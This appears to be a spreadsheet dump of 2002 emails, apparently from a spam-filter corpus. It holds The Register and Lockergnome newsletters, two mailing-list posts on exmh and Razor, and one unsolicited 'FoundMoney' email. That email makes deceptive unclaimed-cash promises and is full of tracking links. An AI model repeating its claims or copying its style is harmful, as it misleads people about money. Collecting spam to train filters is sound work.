         http://www.theregister.co.uk/content/53/26212.html
     HP pulls plug on enterprise software lines
     No Net Action
         http://www.theregister.co.uk/content/53/26209.html
 Personal Hardware
     PC makers to start taking the Tablets
     Mira Image
         http://www.theregister.co.uk/content/54/26222.html
 Semiconductors
     Nvidia intros nForce 2 
     The chipset formerly known as Crush 18
         http://www.theregister.co.uk/content/3/26216.html
     Fears emerge over Intel job cuts 
     Fab 17 for the chop?
         http://www.theregister.co.uk/content/3/26214.html
 Internet
     HP suspends 100+UK staff in email porn probe
     ExclusiveFiring squad
         http://www.theregister.co.uk/content/6/26227.html
     We don't need no stinking ID cards
     Privacy International FAQ
         http://www.theregister.co.uk/content/6/26224.html
     Govt unveils plans for eDemocracy
     Just 'elastoplast for a sickly politics'
         http://www.theregister.co.uk/content/6/26221.html
     MPEG 4 is go (licence fees capped)
     Apple dances Quicktime 6 gig
         http://www.theregister.co.uk/content/6/26219.html
     UK2.net suffers outage
     Like an 'alien abduction'
         http://www.theregister.co.uk/content/6/26218.html
     TFI wants suspended ISP service 'to be sorted'
     The Free Internet liquidation has 'no bearing'
         http://www.theregister.co.uk/content/6/26208.html
     Yahoo! censors portal, kisses Beijing's ass
     Mmmm, good!
         http://www.theregister.co.uk/content/6/26203.html
 Net Security
     Snouts in the honeypot
     Get your Digital Ant Farm here. Only $50K
         http://www.theregister.co.uk/content/55/26229.html
     US Congress approves life terms for crackers
     Bill aims to turn ISPs into snitches
         http://www.theregister.co.uk/content/55/26217.html
     Gweeds gets killed
     Letters Too easy by half
         http://www.theregister.co.uk/content/55/26202.html
     O2 security bubble pricked
     Lame coding error gives up u/n, pw
         http://www.theregister.co.uk/content/55/26200.html
 Anti-Virus News
     Frethem worm poses as Password file
     More shenanigans
         http://www.theregister.co.uk/content/56/26225.html
 Business
     Ballmer 'fesses up to Linux/Windows cost FUD
     Just can't keep that myth alive
         http://www.theregister.co.uk/content/7/26230.html
     Banks seal Energis takeover 
     Norman conquest
         http://www.theregister.co.uk/content/7/26215.html
     NAI sweetens McAfee.com bid 
     A spoonful of sugar makes the poison pill go down
         http://www.theregister.co.uk/content/7/26206.html
 e-business
     Microsoft backs Web services security standard
     Security Assertion Markup Language
         http://www.theregister.co.uk/content/23/26211.html
     Liberty Alliance unveils secure sign-on specs
     Authentic
         http://www.theregister.co.uk/content/23/26210.html
 The Mac Channel
     MPEG 4 is go (licence fees capped)
     Apple dances Quicktime 6 gig
         http://www.theregister.co.uk/content/39/26219.html
 Channel Flannel
     Sun UK resellers under email siege
     And told to stay away from France
         http://www.theregister.co.uk/content/51/26226.html
 Site News
     Reg Hackerettes - The jury delivers its verdict
     You spoke, we listened
         http://www.theregister.co.uk/content/31/26213.html
   --------ADVERTISEMENT------------------------------------------------
   WIN tickets to a FORMULA ONE EUROPEAN GRAND PRIX!
   Neverfail Group plc, business continuity software expert, sponsors Rubens
   Barrichello driver of the Ferrari F1 team. Click here to find out more and
   win tickets: www.neverfailgroup.com/f1theregister.html.
   For every new customer that buys Neverfail(tm) products between the
   July-September 2002 Grand Prix season, Neverfail Group plc will grant 2
   tickets to a Grand Prix hospitality event with us next 2003 season.
   ---------------------------------------------------------------------
 The Register and its contents are copyright 2002 Situation Publishing.
 All rights reserved.
     Tel:     +44 (0)20 7499 2264.
     Fax:     +44 (0)20 7493 5922.
     E-Mail:  press.releases@theregister.co.uk
 To unsubscribe from these daily updates, visit the following URL.  Make
 sure that you enter exactly the same e-mail address as you used to join
 this service.
     http://list.theregister.co.uk/cgi-bin/unsub.cgi
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=#005000 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#005000&gt;&lt;IMG height=1 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" width=1 
       border=0&gt; 
       &lt;DIV align=center&gt;
       &lt;CENTER&gt;
       &lt;TABLE width=566 bgColor=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width="100%" bgColor=#ffffff&gt;
             &lt;TABLE cellSpacing=14 cellPadding=6 width=566 bgColor=#ffffff 
             border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=375&gt;&lt;IMG height=77 
                   src="http://image.linkgift.net/promotions/fmimages/isthisyours.gif" width=298 
                   border=0&gt;&lt;BR&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=252 src="http://image.linkgift.net/promotions/fmimages/check.jpg" width=563 
                   border=0&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=10 
                   src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" width=1 border=0&gt;&lt;BR&gt;&lt;IMG 
                   height=30 src="http://image.linkgift.net/promotions/fmimages/itcouldbe.gif" width=148 
                   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;MarketingonTarget.com&lt;/FONT&gt;&lt;/B&gt; has teamed up 
                   with &lt;/FONT&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;FoundMoney&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT 
                   color=#666666&gt; to help you locate and claim your lost CASH.
                   The amount on that check, OR MORE, literally be YOURS for 
                   the claiming. 
                   &amp;nbsp; &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;This is not a contest or a promotion. &lt;/FONT&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;FoundMoney&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT 
                   color=#666666&gt; is a search service dedicated to putting 
                   UNCLAIMED MONEY together with its rightful 
                 owners.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=47&gt;&lt;IMG height=5 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" 
                   width=1 border=0&gt;&lt;BR&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=40 src="http://image.linkgift.net/promotions/fmimages/featured.gif" width=316 
                   border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;There are &lt;B&gt;31 
                   million&lt;/B&gt; North American people eligible right now to claim unknown 
                   cash windfalls. The search is Fast, Easy and GAURANTEED&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;Over &lt;B&gt; BILLION&lt;/B&gt; is 
                   sitting in our database alone, which contains bank and government accounts, wills and estates, insurance settlements etc.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=65&gt;&lt;IMG height=5 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" 
                   width=1 border=0&gt;&lt;BR&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=56 src="http://image.linkgift.net/promotions/fmimages/9outof10.gif" width=458 
                   border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;CENTER&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;Since 1994, our Web site 
                   has reunited millions upon millions of dollars with thousands 
                   of rightful owners -- &lt;B&gt;who didn't even know&amp;nbsp;&lt;/B&gt; they 
                   had money waiting for them.&amp;nbsp;&lt;/FONT&gt; 
                   &lt;CENTER&gt;&lt;/CENTER&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;Click here&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT color=#666666&gt; 
                   NOW or on the link below to find out -- in seconds -- if there 
                   is money waiting to be claimed in your family name or that of 
                   somebody you know. The INITIAL SEARCH IS 
 FREE.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width="100%" bgColor=#ffffff colSpan=2 height=153&gt;
                   &lt;P align=center&gt;&lt;FONT color=#000000 size=3&gt;&lt;B&gt;YOU HAVE NOTHING 
                   TO LOSE ....&amp;nbsp;&lt;BR&gt;TRY 
                   FOUNDMONEY TODAY&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;P align=center&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;FONT 
                   color=#006666&gt;&lt;B&gt;CLICK HERE NOW!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
                   &lt;P&gt;&lt;FONT color=#666666&gt;Sincerely,&lt;BR&gt;LinkGift.com
                   &lt;/FONT&gt;&lt;/P&gt;
                   &lt;P&gt; 
       &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;IMG 
       height=15 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" width=1 border=0&gt; 
   &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of LinkGift.com's websites or you signed up with a party that has contracted with LinkGift.com. To unsubscribe from our email newsletter, please visit &lt;a href=http://opt-out.linkgift.net/?e=zzzz@spamassassin.taint.org&gt;http://opt-out.linkgift.net/?e=jm@netnoteinc.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;Chris Garrigues said:
  &gt; &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
  &gt; &gt; Date:  Wed, 28 Aug 2002 22:40:21 -0700
  &gt; &gt;
  &gt; &gt; Well, I've used the check-the-modify-time cache trick for files in
  &gt; &gt; many places (not just exmh) so some part of me certainly thinks it
  &gt; &gt; is effective.  However, it occurred to me that if we do checkpoint
  &gt; &gt; state, then aren't we modifying the sequences file for the current
  &gt; &gt; folder on every message read?  Perhaps we look at the sequences file
  &gt; &gt; more than once per message view?  
  &gt; 
  &gt; As I'd written the code a few months ago, we were reading the sequences
  &gt; file 
  &gt; first to see what sequences were in it and then once per sequence.  This
  &gt; 
  &gt; happens anywhere that we look at sequences, most notably in
  &gt; Ftoc_ShowSequences.
  &gt; That seemed to be an obvious lose performancewise, but I wanted my
  &gt; abstraction to 
  &gt; have a separate call for "what sequences are in this folder?" and "what 
  &gt; messages are in this sequence?".  One option would have been to add
  &gt; another 
  &gt; call to get the data off of disk, but I felt that the
  &gt; check-the-modify-time 
  &gt; technique would be less error-prone.
 I like the check-the-modify-time technique.
  &gt; I think the biggest gains would be from augmenting Ftoc_ShowSequences to
  &gt; allow 
  &gt; a finer specification of what needs to be updated in the ftoc so that
  &gt; the 
  &gt; current code would only be run when we really do have to update all
  &gt; sequences 
  &gt; for all messages.  I described these thoughts in an email message
  &gt; yesterday.
  &gt; 
  &gt; And again, if it can wait a few weeks, I'm willing to do it.
 OK - I've yet to dive into the latest round of changes, but I plan to.
 I can say I'll make any progress, but I may dabble.  Thanks again for
 all your work in this area.  Generalized sequence support has been on
 my to do list for about 8 years.
 --
 Brent Welch
 Software Architect, Panasas Inc
 Pioneering the World's Most Scalable and Agile Storage Network
 www.panasas.com
 welch@panasas.com
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 24 July 2002 08:42 am, rODbegbie wrote:
 &gt; rODbegbie wrote:
 &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
 &gt; &gt; mislead users into downloading the dev code in order to get more
 &gt; &gt; unwitting test sites.
 &gt;
 &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
 &gt; intended.
 &gt;
 &gt; As the old maxim goes, "Never ascribe to malice that which can be equally
 &gt; explained by incompetence".
 Oh Yeah that sounds a WHOLE lot better... (chuckle).
 -- 
 _________________________________________________
 No I Don't Yahoo!
 And I'm getting pretty sick of being asked if I do.
 _________________________________________________
 John Andersen / Juneau Alaska
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Digital Media]  Endorsed Compatibility
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020717.html"&gt;
       http://www.lockergnome.com/issues/digitalmedia/20020717.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgmedia-2534370N@sprocket.lockergnome.com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scrollbar-3dlight-color: #DEE8EC; scrollbar-arrow-color: #000000; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #507686; scrollbar-face-color: #A9C4CF; scrollbar-highlight-color: #DEE8EC; scrollbar-shadow-color: #507686 }
  a:link    { COLOR: #0000FF; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #26343A; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 3px solid; BORDER-LEFT: #DEE8EC 3px solid; BORDER-RIGHT: #507686 3px solid; BORDER-TOP: #DEE8EC 3px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020717 Lockergnome Digital Media&lt;/title&gt;&lt;/head&gt;
 &lt;body     MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"     style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#26343A" alink="#008080" link="#0000FF" vlink="#26343A"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/dn.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt"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&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp;07.17.2002 MediaREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. 
 &lt;a href="   http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; 
 of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 This is of course belated, as I'm sending it on the 18th, but Happy Birthday to Lori!
 &lt;p&gt;
 One thing about MacWorld should excite mp3 junkies -- the iPod just got 
 even bigger, with a 20GB version and Apple officially endorses Windows 
 compatibility. Actually, the good news is, the 5GB and 10GB versions 
 came down in price. Hearing that the only "officially" functional 
 Windows player is MusicMatch Jukebox Plus is a serious downer, in my 
 opinion. Sure, MusicMatch is a decent player, but with plenty of great 
 free players on the market, why do we want to purchase a software 
 player in addition to the $299+ hardware unit?
 &lt;p&gt;
 At first glance, it looks like Apple is only paying lipservice to true 
 Windows compatibility. I've seen no mention of any additional 
 functionality, besides song management via one media playing utility. Mediafour's 
 &lt;a href="http://www.mediafour.com/products/xplay/"&gt;XPlay&lt;/a&gt; remains a 
 better option, in my opinion. In addition to allowing you to use an 
 iPod with almost any media player made for Windows, it assists with 
 contact management, via Outlook vCards, in addition to making the 
 iPod an additional drive on your PC. At a mere $10 more than MusicMatch 
 Jukebox Plus, XPlay blows the doors off Apple's officially endorsed player.
 &lt;p&gt;
 Lori and I made the five and a half hour drive to St. Louis for this year's 
 &lt;a href="http://www.sic.org"&gt;SIC&lt;/a&gt; without a hitch. I just missed a 
 face-to-face introduction to John Lal, of 
 &lt;a href="http://www.winferno.com"&gt;winferno.com&lt;/a&gt;, although I'm sure 
 we'll meet tomorrow. John's the guy behind the 
 &lt;a href="http://www.winferno.com/p/lg4/"&gt;free copy of Research-Desk&lt;/a&gt; 
 for all Gnomedex attendees. Shortly after arrival, I enjoyed dinner with 
 the &lt;a href="http://www.esellerate.net"&gt;eSellerate&lt;/a&gt; gang, with a 
 discussion about &lt;a href="http://www.gnometomes.com"&gt;GnomeTomes&lt;/a&gt; and 
 what the future holds.
 &lt;p&gt;
 Every time I travel, I'm reminded just how slow dialup really is. Fortunately, my 
 &lt;a href="http://www.crosspaths.net"&gt;Crosspaths.net&lt;/a&gt; connection allows me 
 to send mail via my Lockergnome account, unlike most of the national dialup 
 services. Crosspaths is technically an Iowa ISP, although the have points of 
 presence in almost every major city in the country. If you're a dialup user, 
 you may want to take a look at their offerings, regardless of where you live. Lori 
 has used their DSL service for two years now, and they've been nothing short of 
 outstanding in dealing with customer service queries. 
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- PRODUCER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePRODUCER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;PNG Files Do Not Show Transparency in Internet Explorer (Q294714)&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714&lt;/a&gt;&lt;p&gt;
 This originally appeared in last weeks Webmaster Weekly, but due to its graphical nature, its worth inclusion here as well:
 &lt;p&gt;
 "If you browse to a Web page that contains an image that has a transparent 
 background in Portable Network Graphics (PNG) format, the image background 
 may appear to be gray rather than transparent."
 Fortunately, Microsoft explains a solution for this problem. Personally, I 
 haven't encountered this PNG display error, but for those of you 
 simplementing PNGs on your sites, you'll want to review the solution.
 &lt;!-- FEATURE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFEATURE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Glitschka.com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.glitschka.com"&gt;http://www.glitschka.com&lt;/a&gt;&lt;p&gt;
 Flash animations,  downloadable icons, artistic doodles, and details about 
 the artist himself are available from this site. You're guaranteed to find 
 something entertaining here, and if you need a logo designed, Von Robert 
 Glitschka might even take you on as a client. The portfolio is extensive, 
 including stock images and even some icons by the artist's seven year old 
 daughter. A must read is the anatomy of an illustration section, which lays 
 down artistic opinion, straight from Glitschka's mouth on how to make a 
 funny creation. The entertainment is accessible accross both Windows and Mac 
 platforms, with icons available in both Mac and PC versions.
 &lt;!-- SKIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSKIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deskmod.com/backend/deskmod/ln.php --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Skin 2 for &lt;a title="Winamp 3.x  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=winamp3" &gt;Winamp 3.x&lt;/a&gt;&lt;/b&gt; by nnic&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/17/02 10:43PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/12808.gif" ALT="Winamp 3.x by nnic"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Skin 2" HREF="http://www.deskmod.com/?download=12808" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=12808" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;p class="url" align="right"&gt;Get your copy of &lt;a href=" https://store.stardock.com/AddProduct.asp?PRODUCT_ID=ESD-SDS-W051&amp;REFERER=lockergnome"&gt;SkinStudio XP&lt;/a&gt;
 &lt;!-- AUDIO --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeAUDIO&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Fight Cloud&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.fightcloud.com"&gt;http://www.fightcloud.com&lt;/a&gt;&lt;p&gt;
 Unknown artists across a variety of genres offer free mp3 downloads of 
 selected tracks, with an option to purchase songs on CD for the price 
 of shipping and handling. All CDs are professionally mastered works, 
 so you're getting label quality releases, without the jacked-up retail 
 price tag. The mp3s let you decide if the album is worth you $4.95. 
 The only thing I find odd about this site is their proclamation of 
 paying artists 50% of distribution profits, which I have to assume is 
 50% of zero, since the CDs are free. The artist selection contains 
 some solid releases by talented artists, regardless. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- PLUGIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePLUGIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;BBE Sonic Maximizer [3.22MB] W9X/W2K/XP $129&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.bbesound.com/products/maxim/directxplugin.asp"&gt;http://www.bbesound.com/products/maxim/directxplugin.asp&lt;/a&gt;&lt;p&gt;
 From home recordings to downloaded mp3s, this DirectX plug-in brings back 
 the clarity to your audio files. Bring back the live feel that gets lost 
 in the recording process, add depth to bass lines, and bring vocals to 
 the front of your audio mix where they belong. Compensate for frequency 
 phase shifting, giving your audio a kick in the pants. This is one post 
 production tool you need in your digital arsenal. Also available as a VST 
 for Mac OS.
 &lt;!-- DVD --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDVD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="left" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a href="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=102360706"&gt;&lt;img alt="DVD" border="0" width="94" height="140" src="http://images.lockergnome.com/images/dvd/whosafraidofvirginiawoolf.jpg"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font style="font-size: 7pt" size="1" color="red" face="Verdana, Tahoma, Arial"&gt;Click for Details&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Who's Afraid of Virginia Woolf?&lt;/b&gt; (NR) 1966&lt;br&gt;
 Adapted Play - 131min&lt;br&gt;
 Reviewer's Tilt (10)&lt;p&gt;
